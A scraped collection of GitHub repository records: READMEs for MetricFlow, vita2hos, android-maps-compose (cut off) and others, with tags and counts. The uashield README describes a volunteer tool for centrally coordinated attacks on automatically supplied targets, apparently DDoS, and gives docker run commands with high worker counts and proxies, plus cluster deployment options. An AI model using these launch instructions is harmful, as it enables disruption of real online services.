[releases/latest](https://github.com/HolographicHat/YaeAchievement/releases/latest) ## ้—ฎ้ข˜ๅ้ฆˆ [issues](https://github.com/HolographicHat/YaeAchievement/issues)ๆˆ–[QQ็พค: 913777414](https://qm.qq.com/cgi-bin/qm/qr?k=9UGz-chQVTjZa4b82RA_A41vIcBVNpms&jump_from=webapi) ## ๅธธ่ง้—ฎ้ข˜ 0. Q: ๆ‰“ไธๅผ€ A: ๅฎ‰่ฃ… [.NET Runtime](https://dotnet.microsoft.com/en-us/download/dotnet/thank-you/runtime-8.0.4-windows-x64-installer) 1. Q: ๅŽŸ็ฅžๅฏๅŠจๆ—ถๆŠฅ้”™: ๆ•ฐๆฎๅผ‚ๅธธ(31-4302) A: ไธ่ฆๆŠŠ่ฝฏไปถๅ’ŒๅŽŸ็ฅžไธป็จ‹ๅบๆ”พไธ€่ตท
ๆ›ดๅฟซใ€ๆ›ดๅ‡†็š„ๅŽŸ็ฅžๆˆๅฐฑๅฏผๅ‡บๅทฅๅ…ท
null
27
12
25
273
3
1
1
dbt-labs/metricflow
<p align="center"> <a target="_blank" href="https://transform.co/metricflow"> <picture> <img alt="metricflow logo" src="https://github.com/dbt-labs/metricflow/raw/main/assets/MetricFlow_logo.png" width="auto" height="120"> </picture> </a> <br /><br /> <b>Build and maintain all of your metric logic in code.</b> <br /><br /> <a target="_blank" href="https://twitter.com/dbt_labs"> <img src="https://img.shields.io/twitter/follow/dbt_labs?labelColor=image.png&color=163B36&logo=twitter&style=flat"> </a> <a target="_blank" href="https://www.getdbt.com/community/"> <img src="https://img.shields.io/badge/Slack-join-163B36"> </a> <a target="_blank" href="https://github.com/dbt-labs/metricflow"> <img src="https://img.shields.io/github/stars/dbt-labs/metricflow?labelColor=image.png&color=163B36&logo=github"> </a> <br /> <a target="_blank" href="https://github.com/dbt-labs/metricflow/blob/master/LICENSE"> <img src="https://img.shields.io/pypi/l/metricflow?color=163B36&logo=AGPL-3.0"> </a> <a target="_blank" href="https://pypi.org/project/metricflow/"> <img src="https://img.shields.io/pypi/v/metricflow?labelColor=&color=163B36"> </a> <img src="https://img.shields.io/pypi/pyversions/metricflow?labelColor=&color=163B36"> </p> # Welcome to MetricFlow See our latest updates in the [Metricflow Changelog](https://github.com/dbt-labs/metricflow/blob/main/CHANGELOG.md)! MetricFlow is a semantic layer that makes it easy to organize metric definitions. It takes those definitions and generates legible and reusable SQL. This makes it easy to get consistent metrics output broken down by attributes (dimensions) of interest. The name comes from the approach taken to generate metrics. A query is compiled into a query plan (represented below) called a dataflow that constructs metrics. The plan is then optimized and rendered to engine-specific SQL. <p align="center"> <img src="https://github.com/dbt-labs/metricflow/raw/main/assets/example_plan.svg" height="500"/> <br /><br /> </p> MetricFlow provides a set of abstractions that help you construct complicated logic and dynamically generate queries to handle: - Multi-hop joins between fact and dimension sources - Complex metric types such as ratio, expression, and cumulative - Metric aggregation to different time granularities - And so much more To get up and running with your own metrics, you should rely on [MetricFlowโ€™s documentation](https://docs.getdbt.com/docs/build/build-metrics-intro). ## Licensing MetricFlow is distributed under a Business Source License (BUSL-1.1). For details on our additional use grant, change license, and change date please refer to our [licensing agreement](https://github.com/dbt-labs/metricflow/blob/main/LICENSE). ## Getting Started ### Install MetricFlow MetricFlow can be installed from PyPi for use as a Python library with the following command: ``` pip install dbt-metricflow ``` MetricFlow currently serves as a query compilation and SQL rendering library, built to work in conjunction with a dbt project. As such, using MetricFlow requires a working dbt project and a dbt adapter. We provide the `dbt-metricflow` bundle for this purpose. You may choose to install other adapters as optional extras from dbt-metricflow. You may need to install Postgres or Graphviz. You can do so by following the install instructions for [Postgres](https://www.postgresql.org/download/) or [Graphviz](https://www.graphviz.org/download/). Mac users may prefer to use brew: `brew install postgresql` or `brew install graphviz`. ### Tutorial The best way to get started is to follow the tutorial steps, which you can access by running: ``` mf tutorial ``` Note: this must be run from a dbt project root directory. ## Resources - [Website](https://transform.co/metricflow) - [Documentation](https://docs.getdbt.com/docs/build/build-metrics-intro) - [Slack Community](https://www.getdbt.com/community/) - [MetricFlow Git Repository](https://github.com/dbt-labs/metricflow) - [CHANGELOG.md](https://github.com/dbt-labs/metricflow/blob/main/CHANGELOG.md) - [TENETS.md](https://github.com/dbt-labs/metricflow/blob/main/TENETS.md) ## Contributing and Code of Conduct This project will be a place where people can easily contribute high-quality updates in a supportive environment. Please read our [code of conduct](https://docs.getdbt.com/community/resources/code-of-conduct) before diving in. To get started on direct contributions, head on over to our [contributor guide](https://github.com/dbt-labs/metricflow/blob/main/CONTRIBUTING.md). ## License MetricFlow is source-available software. Version 0 to 0.140.0 was covered by the Affero GPL license. Version 0.150.0 and greater is covered by the BSL license.. MetricFlow is built by [dbt Labs](https://www.getdbt.com/).
MetricFlow allows you to define, build, and maintain metrics in code.
data,analytics,metrics,pypi,business-intelligence,data-modeling,semantic-layer
16
45
982
2,423
86
271
7
opengs/uashield
# ะ”ะพัั‚ัƒะฟะฝะฐ ะฝะพะฒะฐ ะฒะตั€ัั–ั ะทะฐัั‚ะพััƒะฝะบัƒ | New version of tool is available. UACyberShield V2 ะดะพัั‚ัƒะฟะฝะฐ ะทะฐ ะฟะพัะธะปะฐะฝะฝัะผ https://github.com/opengs/itarmykit . ะฆะตะน ั€ะตะฟะพะทะธั‚ะพั€ั–ะน ะฑัƒะดะต ะทะฐั€ั…ั–ะฒะพะฒะฐะฝะพ ั‚ะพะดั– ะบะพะปะธ ะฑัƒะดะต ะฒะธะฟัƒั‰ะตะฝะฐ ัั‚ะฐะฑั–ะปัŒะฝะฐ ะฒะตั€ัั–ั ะฝะพะฒะพะณะพ ะทะฐัั‚ะพััƒะฝะบัƒ. UACyberShield V2 is available under https://github.com/opengs/itarmykit . This repository will be archived when the stable version of the new tool will be released. # UA Cyber SHIELD *CAUTION! We do not support unlawful attacks or malware campaigns that cause technical harm. We provide you with a tool which you can use, but we are not telling or advising you on what to do with it. YOU are responsible of what you choose to do with it !!!! We are just providing a tool JUST LIKE thousand others on Github. If we give you a hammer - YOU are responsible of what you choose to knock with it !* *See this README [in English](README-en.md)* [![Release](https://img.shields.io/badge/Release-latest-blue)](https://github.com/opengs/uashield/releases/latest) ## ะ”ะปั ะบั–ะฑะตั€ะทะฐั…ะธัะฝะธะบั–ะฒ 1. ะŸั€ะพะณั€ะฐะผะธ ะทะฝะฐั…ะพะดัั‚ัŒัั ะฒ [ั€ะตะปั–ะทะฐั…](https://github.com/opengs/uashield/releases) 2. ะ’ะธะฑะธั€ะฐั”ะผะพ [ะฝะฐะนะฝะพะฒัˆะธะน ั€ะตะปั–ะท](https://github.com/opengs/uashield/releases/latest) ั– ัะฒะพัŽ ะฟะปะฐั‚ั„ะพั€ะผัƒ 3. ะกะบะฐั‡ัƒั”ะผะพ ั– ะทะฐะฟัƒัะบะฐั”ะผะพ **ะฃ ะบะพั€ะธัั‚ัƒะฒะฐั‡ั–ะฒ ะฝะฐ Linux ะผะพะถะปะธะฒะพ ั‚ั€ะตะฑะฐ ะฑัƒะดะต ะดะพะดะฐั‚ะธ ะฐั€ะณัƒะผะตะฝั‚ `--no-sandbox`. ะะฐ Windows ะผะฐั” ะฟั€ะฐั†ัŽะฒะฐั‚ะธ ะฑะตะท ะฑัƒะดัŒ-ัะบะธั… ะดะพะดะฐั‚ะบะพะฒะธั… ะฐั€ะณัƒะผะตะฝั‚ั–ะฒ** ## ะฏะบ ั†ะต ะฟั€ะฐั†ัŽั” ะะฐัˆ ั†ะตะฝั‚ั€ ะฒะพะปะพะฝั‚ะตั€ั–ะฒ ะทะฐะนะผะฐั”ั‚ัŒัั ะฒัั–ั”ัŽ ั‚ัะถะบะพัŽ ั€ะพะฑะพั‚ะพัŽ: ะผะพะฝั–ั‚ะพั€ะธะฝะณะพะผ ั†ั–ะปะตะน, ะฟั–ะดั‚ั€ะธะผะบะพัŽ ั‚ะตั…ะฝั–ั‡ะฝะพั— ั–ะฝั„ั€ะฐัั‚ั€ัƒะบั‚ัƒั€ะธ, ะบะพะพั€ะดะธะฝะฐั†ั–ั”ัŽ ะฐั‚ะฐะบ, ะฟะตั€ะตะดะฐั‡ะตัŽ ะดะฐะฝะธั… ะดะพ ะฟั€ะพะณั€ะฐะผ ะบะปั–ั”ะฝั‚ั–ะฒ, ั‚ะพั‰ะพ. ะขะพะผัƒ ะฝะฐ ะผะพะผะตะฝั‚ ะฐั‚ะฐะบะธ ะฒัั– ะฟั–ะดะณะพั‚ะพะฒั‡ั– ะดะฐะฝั– ั”. ะ’ะฐะผ ะทะฐะปะธัˆะฐั”ั‚ัŒัั ั‚ั–ะปัŒะบะธ ะฒัั‚ะฐะฝะพะฒะธั‚ะธ ะฟั€ะพะณั€ะฐะผัƒ ั– ะฟั€ะธั”ะดะฝะฐั‚ะธัั. ะฆั–ะปั– ะทะผั–ะฝัŽัŽั‚ัŒัั ะฐะฒั‚ะพะผะฐั‚ะธั‡ะฝะพ ั– ะฟั–ะดะฒะฐะฝั‚ะฐะถัƒัŽั‚ัŒัั ะท ั†ะตะฝั‚ั€ัƒ ะบะพะพั€ะดะธะฝะฐั†ั–ั—. ## ะ†ะฝั‚ะตั€ั„ะตะนั ะฟั€ะพะณั€ะฐะผะธ ![A working example](docs/working.png) ## ะ—ะฑั–ั€ะบะฐ ะบะพะดัƒ 1. ะšะปะพะฝัƒั”ะผะพ ั€ะตะฟะพะทะธั‚ะพั€ั–ะน: `git clone https://github.com/opengs/uashield.git` 2. ะ’ัั‚ะฐะฝะพะฒะปัŽั”ะผะพ ะทะฐะปะตะถะฝะพัั‚ั–: `cd uashield && yarn install` 3. ะ—ะฑะธั€ะฐั”ะผะพ ะฟั€ะพะณั€ะฐะผัƒ: `yarn build:electron` 4. ะ—ะฐะฟัƒัะบะฐั”ะผะพ ะฒะธะบะพะฝะฐะฒั‡ะธะน ั„ะฐะนะป ะฒ `./dist/electron` ะฐะฑะพ ะตะปะตะบั‚ั€ะพะฝ ะฒะตั€ัั–ัŽ: `yarn start:electron` ### ะ—ะฑั–ั€ะบะฐ ะบะพะดัƒ - headless 1. ะ—ะฑะธั€ะฐั”ะผะพ ะฟั€ะพะณั€ะฐะผัƒ: `yarn build:headless` 2. ะ—ะฐะฟัƒัะบะฐั”ะผะพ `yarn start:headless` ## Headless ะฒะตั€ัั–ั (Docker) 1. ะ—ะฑั–ั€ะบะฐ ะพะฑั€ะฐะทัƒ: `docker build . -t uashield` 2. ะ—ะฐะฟัƒัะบ: `docker run uashield --workers=500 --withProxy=true` - ะดะต `workers` - ะบั–ะปัŒะบั–ัั‚ัŒ ะฟะพั‚ะพะบั–ะฒ, ั– --withProxy=`true` | `false` ั‡ะธ ะฒะธ ะฑะฐะถะฐั”ั‚ะต ะฒะธะบะพั€ะธัั‚ะพะฒัƒะฒะฐั‚ะธ ะฟั€ะพะบัั– ะŸะพะฒะฝะฐ ะดะพะฒั–ะดะบะฐ ะฟั€ะพ ะบะพะผะฐะฝะดะธ: `docker run uashield --help` ะะฑะพ ะทะฐ ะดะพะฟะพะผะพะณะพัŽ ะฒะถะต [ะทั–ะฑั€ะฐะฝะพะณะพ ะพะฑั€ะฐะทัƒ](https://github.com/opengs/uashield/pkgs/container/uashield): ```bash docker run ghcr.io/opengs/uashield:master --workers=512 --withProxy=true ``` ## Docker-compose ะฒะตั€ัั–ั 1. ะ—ะฐะฟัƒัะบ: `docker-compose up -d` 2. ะ’ั–ะดั€ะตะดะฐะณัƒะนั‚ะต ะทะฝะฐั‡ะตะฝะฝั ะทะผั–ะฝะฝะธั… `WORKERS` ั‚ะฐ `USEPROXY` ะฒ ั„ะฐะนะปั– `docker-compose.yml` - ะดะต `256` - ะบั–ะปัŒะบั–ัั‚ัŒ ะฟะพั‚ะพะบั–ะฒ, ั– `true` | `false` ั‡ะธ ะฒะธ ะฑะฐะถะฐั”ั‚ะต ะฒะธะบะพั€ะธัั‚ะพะฒัƒะฒะฐั‚ะธ ะฟั€ะพะบัั– ## ะ ะพะทะณะพั€ั‚ะฐะฝะฝั ะฝะฐ Raspberry Pi [![balena deploy button](https://www.balena.io/deploy.svg)](https://dashboard.balena-cloud.com/deploy?repoUrl=https://github.com/opengs/uashield) ## ะ ะพะทะณะพั€ั‚ะฐะฝะฝั ะทะฐ ะดะพะฟะพะผะพะณะพัŽ Ansible [tools/ansible/README.md](tools/ansible/README.md) ## ะ ะพะทะณะพั€ั‚ะฐะฝะฝั ัƒ Kubernetes [tools/helm/README.md](tools/helm/README.md) ## ะ ะพะทะณะพั€ั‚ะฐะฝะฝั ะฝะฐ Play With Docker - ะฑะตะทะบะพัˆั‚ะพะฒะฝะธะน ั–ะฝัั‚ะฐะฝั ะฝะฐ 4 ะณะพะดะธะฝะธ [![Try in PWD](https://raw.githubusercontent.com/play-with-docker/stacks/master/assets/images/button.png)](https://labs.play-with-docker.com/?stack=https://raw.githubusercontent.com/opengs/uashield/master/pwd-docker-compose.yml) ## ะŸะพะถะตั€ั‚ะฒัƒะฒะฐะฝะฝั ะŸะพะถะตั€ั‚ะฒัƒะฒะฐะฝะฝั ะฑัƒะดัƒั‚ัŒ ะฒะธะบะพั€ะธัั‚ะพะฒัƒะฒะฐั‚ะธัั ะฒะธะบะปัŽั‡ะฝะพ ะดะปั ั†ั–ะปะตะน ะฟั€ะพะณั€ะฐะผะธ: 1. ะ—ะฐะบัƒะฟั–ะฒะปั ะฟั€ะพะบัั– ัะตั€ะฒะตั€ั–ะฒ ะดะปั ะฐั‚ะฐะบ 2. ะ—ั€ั–ะดะบะฐ ะทะฐะบัƒะฟั–ะฒะปั ัะตั€ะฒะตั€ั–ะฒ ะดะปั ั€ะพะทะผั–ั‰ะตะฝะฝั IT ั–ะฝั„ั€ะฐัั‚ั€ัƒะบั‚ัƒั€ะธ ะšะพะปะธ ะผะธ ะฟะตั€ะตะผะพะถะตะผะพ ะฒ ั†ั–ะน ะฒั–ะนะฝั– ั– ะฝะฐัั‚ะฐะฝะต ะผะธั€ะฝะธะน ั‡ะฐั, ะณั€ะพัˆั– ั‰ะพ ะทะฐะปะธัˆะฐั‚ัŒัั ะฑัƒะดัƒั‚ัŒ ะฟะตั€ะตะดะฐะฝั– ะฑะปะฐะณะพะดั–ะนะฝะธะผ ะพั€ะณะฐะฝั–ะทะฐั†ั–ัะผ ะฝะฐ ะดะพะฟะพะผะพะณัƒ ะถะตั€ั‚ะฒะฐะผ ั†ั–ั”ั— ะฒั–ะนะฝะธ. ะ ะฐั…ัƒะฝะบะธ ะดะปั ะฟะตั€ะตะบะฐะทัƒ ะบะพัˆั‚ั–ะฒ: - BTC: bc1q7e6ew74x56vdpsev5ycqq8ke3tk4yv5452l25g - ETH: 0x9472538607eE28F69FE7dAcD6C4cC17B9A20664F - USDT (ETH): 0x9472538607eE28F69FE7dAcD6C4cC17B9A20664F **ั†ั ะฐะดั€ะตัะฐ ะฒ ะผะตั€ะตะถั– ETH** ะฏะบัˆะพ ะฒะธ ั…ะพั‡ะตั‚ะต ะฟะพั‡ะฐัั‚ัƒะฒะฐั‚ะธ ั€ะพะทั€ะพะฑะฝะธะบั–ะฒ ะบะฐะฒะพัŽ ั‰ะพะฑ ะฒะพะฝะธ ะผะพะณะปะธ ะฟั€ะพะณัƒะปัŽะฒะฐั‚ะธ ั€ะพะฑะพั‚ัƒ ั– ะฝะต ัะฟะฐั‚ะธ ะฝะพั‡ะฐะผะธ: - BTC: bc1q7g5s3c89lymc9vtrf0y8tqyx4mg0hefeyr6zsv - ETH: 0x75A291AB6795f747177975bac250B47A33ee54Ed - USDT (ETH): 0x75A291AB6795f747177975bac250B47A33ee54Ed **ั†ั ะฐะดั€ะตัะฐ ะฒ ะผะตั€ะตะถั– ETH** ะ’ ะผะฐะนะฑัƒั‚ะฝัŒะพะผัƒ ะผะธ ะดะพะดะฐะผะพ ั—ั… ั‰ะต ะฑั–ะปัŒัˆะต :)
Voluntary Ukraine security platform to protect us from Russian forces in the Internet
ukraine,ukraine-invasion,cybersecurity
37
38
113
338
27
5
6
xerpi/vita2hos
# _vita2hos_ A PlayStation Vita to Horizon OS (Nintendo Switch OS) translation layer (**_not_** an emulator) ## How does it work? PlayStation Vita (ARMv7 CPU) executables can be run natively on Nintendo Switch ARMv8 CPU in 32-bit execution mode. When loading a PlayStation Vita executable, _vita2hos_ redirects the [module](https://wiki.henkaku.xyz/vita/Modules) imports of said executable to jump to routines that implement the same behavior, by using native Horizon OS services, like the one exposed by the original PlayStation Vita OS modules. ## How can I use it? ### Running it on a real console 1. Copy `vita2hos.nsp` to your microSD card (i.e. to: `atmosphere/vita2hos.nsp`) 2. Create [`atmosphere/config/override_config.ini`](https://github.com/Atmosphere-NX/Atmosphere/blob/master/config_templates/override_config.ini) and add the following lines to it: ```ini [hbl_config] override_any_app=true override_any_app_key=R override_any_app_address_space=32_bit ; adjust the path according to the location of your file path=atmosphere/vita2hos.nsp ``` - Note: As long as this file exists you won't be able to use the homebrew menu and instead will always run _vita2hos_. A quick workaround would be to rename the file and restart your Switch. Unfortunately `override_config.ini` doesn't allow multiple `path` entries which is why it has to be done this way. 3. Copy a PlayStation Vita executable (`.velf` or `.self`/`eboot.bin`) to `sd:/vita2hos/executable` 4. Boot (or reboot) your Switch and start any game while holding down `R` - Attempting to use _vita2hos_ via applet mode (album button) will currently result in a fatal error and wouldn't be recommended anyway. 5. Enjoy! ### Running it on yuzu 1. Copy a PlayStation Vita executable (`.velf` or `.self`/`eboot.bin`) to `sd:/vita2hos/executable` (_File_ โ†’ _Open yuzu Folder_ โ†’ `sdmc/`) 2. Run `vita2hos.nsp` 3. Enjoy! ### Running it on Ryujinx 1. Copy a PlayStation Vita executable (`.velf` or `.self`/`eboot.bin`) to `sd:/vita2hos/executable` (_File_ โ†’ _Open Ryujinx Folder_ โ†’ `sdcard/`) 2. Disable PPTC (_Options_ โ†’ _Settings_ โ†’ _System_ โ†’ Unselect _Enable PPTC (Profiled Persistent Translation Cache)_) 3. Run `vita2hos.nsp` 4. Enjoy! ## Building 1. `mkdir build && cd build` 2. Two options:\ &ensp;a. `arm-none-eabi-cmake ..`\ &ensp;b. `cmake -DCMAKE_TOOLCHAIN_FILE:FILEPATH=$DEVKITPRO/cmake/devkitARM.cmake ..` 3. `make` (or `ninja` if configured with `-G Ninja`) 4. `vita2hos.nsp` will be generated I recommend passing `-DCMAKE_COLOR_DIAGNOSTICS:BOOL=TRUE`, especially when using Ninja. ## Project status, compatibility and supported features This is still in very early stages and therefore it can only run very simple CPU-rendered PlayStation Vita homebrews. There is very initial 3D graphics support (it can run vitasdk's GXM triangle and cube samples by hardcoding _vita2hos_'s GLSL shaders to match the Cg shaders the samples use). ## Special Thanks A few noteworthy teams/projects who've helped along the way are: * **[Vita3K](https://vita3k.org/)** _vita2hos_ uses Vita3K's shader recompiler, and some parts of _vita2hos_'s code are based on Vita3K's implementation. Please, consider [**donating**](https://vita3k.org/#donate) and [**contributing**](https://vita3k.org/#contribute) to Vita3K! * **[UAM - deko3d shader compiler](https://github.com/devkitPro/uam)** _vita2hos_ uses UAM ([deko3d](https://github.com/devkitPro/deko3d)'s shader compiler) to compile shaders. Please, also consider contributing to that project and donating to the developers! * **[Ryujinx](https://ryujinx.org/)** * **[yuzu](https://yuzu-emu.org/)** * **[Atmosphรจre](https://github.com/Atmosphere-NX/Atmosphere)** * **[Switchbrew](https://github.com/switchbrew/)** Also special thanks to @PixelyIon and @SciresM for their help, and to all the testers, especially @TSRBerry. ## Disclaimer * **Nintendo Switch** is a trademark of **Nintendo Co., Ltd** * **PlayStation Vita** is a trademark of **Sony Interactive Entertainment**
[WIP] PlayStation Vita to Horizon OS (Nintendo Switch OS) translation layer
null
3
14
5
119
4
8
0
googlemaps/android-maps-compose
![Tests](https://github.com/googlemaps/android-maps-compose/actions/workflows/test.yml/badge.svg) ![Stable](https://img.shields.io/badge/stability-stable-green) [![Discord](https://img.shields.io/discord/676948200904589322)][Discord server] ![Apache-2.0](https://img.shields.io/badge/license-Apache-blue) # Maps Compose ๐Ÿ—บ ## Description This repository contains [Jetpack Compose][jetpack-compose] components for the [Maps SDK for Android][maps-sdk]. ## Requirements * Kotlin-enabled project * Jetpack Compose-enabled project (see [releases](https://github.com/googlemaps/android-maps-compose/releases) for the required version of Jetpack Compose) * An [API key][api-key] * API level 21+ ## Installation You no longer need to specify the Maps SDK for Android or its Utility Library as separate dependencies, since `maps-compose` and `maps-compose-utils` pull in the appropriate versions of these respectively. ```groovy dependencies { implementation 'com.google.maps.android:maps-compose:5.0.4' // Optionally, you can include the Compose utils library for Clustering, // Street View metadata checks, etc. implementation 'com.google.maps.android:maps-compose-utils:5.0.4' // Optionally, you can include the widgets library for ScaleBar, etc. implementation 'com.google.maps.android:maps-compose-widgets:5.0.4' } ``` ## Sample App This repository includes a [sample app](app). To run it: 1. Get a [Maps API key][api-key] 1. Create a file in the root directory named `local.properties` with a single line that looks like this, replacing YOUR_KEY with the key from step 1: `MAPS_API_KEY=YOUR_KEY` 1. Build and run ## Documentation You can learn more about all the extensions provided by this library by reading the [reference documents][Javadoc]. ## Usage Adding a map to your app looks like the following: ```kotlin val singapore = LatLng(1.35, 103.87) val cameraPositionState = rememberCameraPositionState { position = CameraPosition.fromLatLngZoom(singapore, 10f) } GoogleMap( modifier = Modifier.fillMaxSize(), cameraPositionState = cameraPositionState ) ``` <details> <summary>Creating and configuring a map</summary> ## Creating and configuring a map Configuring the map can be done by passing a `MapProperties` object into the `GoogleMap` composable, or for UI-related configurations, use `MapUiSettings`. `MapProperties` and `MapUiSettings` should be your first go-to for configuring the map. For any other configuration not present in those two classes, use `googleMapOptionsFactory` to provide a `GoogleMapOptions` instance instead. Typically, anything that can only be provided once (i.e. when the map is created)โ€”like map IDโ€”should be provided via `googleMapOptionsFactory`. ```kotlin // Set properties using MapProperties which you can use to recompose the map var mapProperties by remember { mutableStateOf( MapProperties(maxZoomPreference = 10f, minZoomPreference = 5f) ) } var mapUiSettings by remember { mutableStateOf( MapUiSettings(mapToolbarEnabled = false) ) } Box(Modifier.fillMaxSize()) { GoogleMap(properties = mapProperties, uiSettings = mapUiSettings) Column { Button(onClick = { mapProperties = mapProperties.copy( isBuildingEnabled = !mapProperties.isBuildingEnabled ) }) { Text(text = "Toggle isBuildingEnabled") } Button(onClick = { mapUiSettings = mapUiSettings.copy( mapToolbarEnabled = !mapUiSettings.mapToolbarEnabled ) }) { Text(text = "Toggle mapToolbarEnabled") } } } // ...or initialize the map by providing a googleMapOptionsFactory // This should only be used for values that do not recompose the map such as // map ID. GoogleMap( googleMapOptionsFactory = { GoogleMapOptions().mapId("MyMapId") } ) ``` </details> <details> <summary>Controlling a map's camera</summary> ### Controlling a map's camera Camera changes and updates can be observed and controlled via `CameraPositionState`. **Note**: `CameraPositionState` is the source of truth for anything camera related. So, providing a camera position in `GoogleMapOptions` will be overridden by `CameraPosition`. ```kotlin val singapore = LatLng(1.35, 103.87) val cameraPositionState: CameraPositionState = rememberCameraPositionState { position = CameraPosition.fromLatLngZoom(singapore, 11f) } Box(Modifier.fillMaxSize()) { GoogleMap(cameraPositionState = cameraPositionState) Button(onClick = { // Move the camera to a new zoom level cameraPositionState.move(CameraUpdateFactory.zoomIn()) }) { Text(text = "Zoom In") } } ``` </details> <details> <summary>Drawing on a map</summary> ### Drawing on a map Drawing on the map, such as adding markers, can be accomplished by adding child composable elements to the content of the `GoogleMap`. ```kotlin GoogleMap( googleMapOptionsFactory = { GoogleMapOptions().mapId("DEMO_MAP_ID") }, //... ) { AdvancedMarker( state = MarkerState(position = LatLng(-34, 151)), title = "Marker in Sydney" ) AdvancedMarker( state = MarkerState(position = LatLng(35.66, 139.6)), title = "Marker in Tokyo" ) } ``` You can customize a marker by using `PinConfig` with an `AdvancedMarker`. ```kotlin val state = MyState() GoogleMap( googleMapOptionsFactory = { GoogleMapOptions().mapId("DEMO_MAP_ID") }, //... ) { val pinConfig = PinConfig.builder() .setBackgroundColor(Color.MAGENTA) .build() AdvancedMarker( state = MarkerState(position = LatLng(-34, 151)), title = "Magenta marker in Sydney", pinConfig = pinConfig ) } ``` </details> <details> <summary>Shapes</summary> ### Shapes A shape is an object on the map, tied to a latitude/longitude coordinate. Currently, android-maps-compose offers `Polyline`, `Polygon` and `Circle`. For all shapes, you can customize their appearance by altering a number of properties. #### Polyline A `Polyline` is a series of connected line segments that can form any shape you want and can be used to mark paths and routes on the map: ```kotlin val polylinePoints = remember { listOf(singapore, singapore5) } // ... Polyline( points = polylinePoints ) ``` You can use spans to individually color segments of a polyline, by creating StyleSpan objects: ```kotlin val styleSpan = StyleSpan( StrokeStyle.gradientBuilder( Color.Red.toArgb(), Color.Green.toArgb(), ).build(), ) // ... val polylinePoints = remember { listOf(singapore, singapore5) } val styleSpanList = remember { listOf(styleSpan) } // ... Polyline( points = polylinePoints, spans = styleSpanList, ) ``` #### Polygon A `Polygon` is an enclosed shape that can be used to mark areas on the map: ```kotlin val polygonPoints = remember { listOf(singapore1, singapore2, singapore3) } // ... Polygon( points = polygonPoints, fillColor = Color.Black.copy(alpha = 0.5f) ) ``` #### Circle A Circle is a geographically accurate projection of a circle on the Earth's surface drawn on the map: ```kotlin var circleCenter by remember { mutableStateOf(singapore) } // ... Circle( center = circleCenter, fillColor = MaterialTheme.colors.secondary, strokeColor = MaterialTheme.colors.secondaryVariant, radius = 1000.0, ) ``` </details> <details> <summary>Recomposing elements</summary> ### Recomposing elements Markers and other elements need to be recomposed in the screen. To achieve recomposition, you can set mutable properties of state objects: ```kotlin val markerState = rememberMarkerState(position = singapore) //... LaunchedEffect(Unit) { repeat(10) { delay(5.seconds) val old = markerState.position markerState.position = LatLng(old.latitude + 1.0, old.longitude + 2.0) } } ``` In the example above, recomposition occurs as `MarkerState.position` is updated with different values over time, shifting the Marker around the screen. </details> <details> <summary>Customizing a marker's info window</summary> ### Customizing a marker's info window You can customize a marker's info window contents by using the `MarkerInfoWindowContent` element, or if you want to customize the entire info window, use the `MarkerInfoWindow` element instead. Both of these elements accept a `content` parameter to provide your customization in a composable lambda expression. ```kotlin MarkerInfoWindowContent( //... ) { marker -> Text(marker.title ?: "Default Marker Title", color = Color.Red) } MarkerInfoWindow( //... ) { marker -> // Implement the custom info window here Column { Text(marker.title ?: "Default Marker Title", color = Color.Red) Text(marker.snippet ?: "Default Marker Snippet", color = Color.Red) } } ``` </details> <details> <summary>Street View</summary> ### Street View You can add a Street View given a location using the `StreetView` composable. 1. Test whether a Street View location is valid with the the `fetchStreetViewData` utility from the [`maps-compose-utils` library](#maps-compose-utility-library). ```kotlin streetViewResult = fetchStreetViewData(singapore, BuildConfig.MAPS_API_KEY) ``` 2. Once the location is confirmed valid, add a Street View composable by providing a `StreetViewPanoramaOptions` object. ```kotlin val singapore = LatLng(1.3588227, 103.8742114) StreetView( streetViewPanoramaOptionsFactory = { StreetViewPanoramaOptions().position(singapore) } ) ``` </details> <details> <summary>Controlling the map directly (experimental)</summary> ## Controlling the map directly (experimental) Certain use cases may require extending the `GoogleMap` object to decorate / augment the map. It can be obtained with the `MapEffect` Composable. Doing so can be dangerous, as the `GoogleMap` object is managed by this library. ```kotlin GoogleMap( // ... ) { MapEffect { map -> // map is the GoogleMap } } ``` </details> ## Maps Compose Utility Library This library provides optional utilities in the `maps-compose-utils` library from the [Maps SDK for Android Utility Library](https://github.com/googlemaps/android-maps-utils). ### Clustering The marker clustering utility helps you manage multiple markers at different zoom levels. When a user views the map at a high zoom level, the individual markers show on the map. When the user zooms out, the markers gather together into clusters, to make viewing the map easier. The [MarkerClusteringActivity](app/src/main/java/com/google/maps/android/compose/MarkerClusteringActivity.kt) demonstrates usage. ```kotlin Clustering( items = items, // Optional: Handle clicks on clusters, cluster items, and cluster item info windows onClusterClick = null, onClusterItemClick = null, onClusterItemInfoWindowClick = null, // Optional: Custom rendering for clusters clusterContent = null, // Optional: Custom rendering for non-clustered items clusterItemContent = null, ) ``` ### Street View metadata utility The `fetchStreetViewData` method provides functionality to check whether a location is supported in StreetView. You can avoid errors when adding a Street View panorama to an Android app by calling this metadata utility and only adding a Street View panorama if the response is OK. > [!IMPORTANT] > Be sure to [enable Street View Static API](https://goo.gle/enable-sv-static-api) on the project associated with your API key. You can see example usage in the [`StreetViewActivity`](https://github.com/googlemaps/android-maps-compose/blob/main/app/src/main/java/com/google/maps/android/compose/StreetViewActivity.kt) of the demo app: ```kotlin streetViewResult = fetchStreetViewData(singapore, BuildConfig.MAPS_API_KEY) ``` ## Maps Compose Widgets This library also provides optional composable widgets in the `maps-compose-widgets` library that you can use alongside the `GoogleMap` composable. ### ScaleBar This widget shows the current scale of the map in feet and meters when zoomed into the map, changing to miles and kilometers, respectively, when zooming out. A `DisappearingScaleBar` is also included, which appears when the zoom level of the map changes, and then disappears after a configurable timeout period. The [ScaleBarActivity](app/src/main/java/com/google/maps/android/compose/ScaleBarActivity.kt) demonstrates both of these, with the `DisappearingScaleBar` in the upper left corner and the normal base `ScaleBar` in the upper right: ![maps-compose-scale-bar-cropped](https://user-images.githubusercontent.com/928045/175665891-a0635004-2201-4392-83b3-0c6553b96926.gif) Both versions of this widget leverage the `CameraPositionState` in `maps-compose` and therefore are very simple to configure with their defaults: ```kotlin Box(Modifier.fillMaxSize()) { GoogleMap( modifier = Modifier.fillMaxSize(), cameraPositionState = cameraPositionState ) { // ... your map composables ... } ScaleBar( modifier = Modifier .padding(top = 5.dp, end = 15.dp) .align(Alignment.TopEnd), cameraPositionState = cameraPositionState ) // OR DisappearingScaleBar( modifier = Modifier .padding(top = 5.dp, end = 15.dp) .align(Alignment.TopStart), cameraPositionState = cameraPositionState ) } ``` The colors of the text, line, and shadow are also all configurable (e.g., based on `isSystemInDarkTheme()` on a dark map). Similarly, the 